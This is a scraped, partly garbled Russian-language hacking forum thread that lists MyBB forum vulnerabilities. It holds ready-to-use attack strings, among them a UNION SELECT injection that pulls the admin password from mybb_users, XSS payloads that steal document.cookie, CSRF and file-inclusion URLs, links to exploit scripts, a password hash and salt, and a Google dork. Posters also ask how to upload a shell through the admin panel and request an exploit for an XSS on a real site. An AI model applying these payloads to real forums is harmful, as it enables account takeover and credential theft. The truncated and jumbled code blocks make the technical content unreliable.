![]() |
[Обзор уязвимостей myBB]
MyBB <= 1.00 RC4
SQL Injection Exploit Exploit: http://milw0rm.org/exploits/1022 http://milw0rm.org/exploits/1172 MyBB 1.0.2 Название префикса таблиц Код:
http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3SQL-иньекция [CODE]http://www.example.com/moderation.php?posts=[pid]| Код:
&tid=[pid]&action=do_multimergeposts&sep=hrSQL-иньекция Exploit: http://www.security.nnov.ru/files/mybbex.pl MyBB <= 1.1.2 SQL-иньекция Код:
http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/*remote code execution Exploit: http://www.security.nnov.ru/files/mybibi.pl MyBB <= 1.1.3 Create An Admin Exploit Exploit: http://milw0rm.org/exploits/1950 MyBB <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit Exploit: http://www.security.nnov.ru/files/mybbsipsql.php |
*************Внимание - Внимание*****************
Уважаемые пользователи, стыд да срам. Впредь флуд в этой теме, а также в подобных темах, будет строго наказываться. Это первое и последнее предупреждение. *************Внимание - Внимание***************** *************Attention - Attention***************** Dear users, shame on you. Flood in this and similar themes will be strictly punished from now. It is last warning *************Attention - Attention***************** |
XSS в Punbb<=1.2.14 & Mybb.ru
XSS в Punbb<=1.2.14 & Mybb.ru
В профиле в поле веб-сайт идет проверка на наличие "http://", и если этой фигни нет, то она автоматически ставится на первое место. Таким образом, код типа: javascript:{while (true) alert('http:// xss дырка')} работает. Единственное что - плохо, что длинна строки ограничена. Но как минимум хороший сниф можно будет всунуть без изврата с аватарми, да и алертами помучить админа. :) Источник: http://forscripts.moy.su/blog/2007-04-10-40 Пример работы: http://forscripts.3bb.ru/viewtopic.php?pid=9#p9 |
Цитата:
|
MyBB Search Denial of Service
Код:
#!/usr/bin/perl |
|
3
Mybb Hot Editor Plugin Local File Inclusion (keyboard.php)
MyBB Search Denial of Service: Код:
#!/usr/bin/perlКод:
<form action="http://website/mybb_dir/member.php?debug=1"; method="post">http://target/mybb/archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script> 1.2 inc/generic_error.php?message=<script>alert(document.c ookie);</script> inc/generic_error.php?message=1&code=<script>alert(doc ument.cookie);</script> 1.1.7 /admin/index.php/”><script>alert(1)</script> Cross-Site Request Forgery and Cross-Site Scripting (private.php) Код:
First of all user must be REGISTERED and authorizedКод:
javasc ript:alert(123)inc/plugins/hello.php inc/generic_error.php?message=1 inc/datahandlers/event.php inc/datahandlers/pm.php inc/datahandlers/post.php inc/datahandlers/user.php 1.2.4 http://[TARGET]/[mybb-directory]/member.php?action[]=registe http://[TARGET]/[mybb-directory]/inc/datahandlers/event.php http://[TARGET]/[mybb-directory]/captcha.php?imagehash[]=123 |
MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit Код:
#!/usr/bin/php -q -d short_open_tag=onMyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities 1. Remote Code Execution in "forumdisplay.php": Код:
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='Код:
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2Код:
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]Код:
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] |
Multy vuln MyBB (formerly MyBulletinBoard) 1.x
MyBB (formerly MyBulletinBoard) 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий и произвольные SQL команды в базе данных приложения. 1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "sortby" в forumdisplay.php и search.php (когда "action" установлен в значение "results") перед использованием в вызове "eval()". Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе. Успешное эксплуатирование уязвимости требует включение знание валидных значений "fid" для forumdisplay.php и значений "sid" для search.php. 2) Уязвимость существует из-за недостаточной обработки входных данных в параметре массива "mergepost" (когда "action" установлен в значение "do_mergeposts"), "rid" (когда "action" установлен в "allreports"), и "threads" (когда "action" установлен в "do_multimovethreads") в moderation.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных модератора. 3) Уязвимость существует из-за недостаточной обработки входных данных в параметре "request" и "gid" в admin/usergroups.php (когда "action" установлен в значение "do_joinrequests"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных администратора. |
Multiple Sql Injections in MyBB 1.2.10
SQL Injection in "moderation.php" action "do_mergeposts"
Vulnerable: 1.2.10 Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "do_mergeposts" Далее "waraxe"- имя админа PoC: Код:
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts Код:
MySQL error: 1054 Exploit: Код:
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts Код:
MySQL error: 1064 aff3fcfc70d2a50c3d4c2158233c3901 - хэш пароля C5ybEW6b - соль SQL Injection in "moderation.php" action "allreports" Для успешной реализации уязвимости необходимы привилегии модератора PoC: Код:
http://localhost/mybb.1.2.10/moderation.Код:
MySQL error: 1054 SQL Injection in "moderation.php" action "do_multimovethreads" Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "canmanagethreads" PoC: Код:
http://localhost/mybb.1.2.10/moderation.Код:
MySQL error: 1054 |
Delete PM's XSRF Vuln
MyBB 1.2.11
Цитата:
|
mybb1.2.11 [disablesmilies] Remote SQL-injection Exploit
Вложений: 1
MyBB <= 1.2.11 [disablesmilies] Remote SQL-injection Exploit Author: Janek Vind, [waraxe-2008-SA#064], 21. January 2008, Estonia, Tartu, http://www.waraxe.us/advisory-64.html Авторизуйтесь на форуме чтоб получить валидную куку в браузер, после чего впишите в поля свой ID и ник. За одно нажатие вы отправите самому себе два сообщения, одно формальное, а второе - с логином и паролем админа. Если в таблице сессий есть валидная сессия - можете получить её оттуда и поадминить форумом без пасса. Напоминаю, что привязка по айпи обходилась раньше через CLIENT-IP. [ i ] Password algoritm : md5(md5($salt).md5($password)) |
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit
Код:
#!/usr/bin/perl |
MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability
MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability
Код:
################################################################################### |
Ребят а как определить версию myBB?
Смотрел хтмл код, там конечно ничего нет. Пару раз видел, что у копирайта писали версию, но это единицы. Прошу ответить на вопрос. |
как определить версию myBB
Цитата:
Пример: Код HTML:
<settings version="122" exported="1129013345">/install/resources/mybb_theme.xml Пример: Код HTML:
<?xml version="1.0" encoding="UTF-8"?> |
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2 или 3)
http://milw0rm.com/exploits/6316
PHP код:
|
Full path disclosure MyBB 1.4.x
Код:
/admin/modules/config/smilies.php |
MyBB (FWS Mod) reflected XSS
Mod Name: Forum Warning System (http://community.mybboard.net/attachment.php?aid=6814) Vulnerable piece of code: Код:
//USERCP AND PM CHANGES Google dork: inurl:fws.php; "MyBB" inurl:fws.php http://securityvulns.ru/Vdocument379.html |
xss
прив всем ,нашел на mybb2.ru xss вот записал видео http://narod.ru/disk/8621473000/xss_...mybb2.rar.html ,плз подскажите какой-нить сплоит к нему
xss href="viewtopic.php?t=1529&start=0&postday s=0&postorder=asc&highlight=" |
MyBB 1.4.6 3 May 2009
Доступ Админка Уязвимость существует из-за недостаточной обработки входных данных в URL xss можно засунуть в Категории & Форума Решение:http://mybboard.it/forum/thread-3623.html |
MyBB 1.4.8 последняя версия 26 June 2009
очередной дырка пока не перекрыли) Доступ:Админка Уязвимость существует из-за недостаточной обработки входных данных в URL xss можно засунуть в Категории & Форума Решение:пока нету DEMO:http://sniffers.ueuo.com/ |
Цитата:
|
Цитата:
|
а как шелл залить из админке?
|
| Время: 17:39 |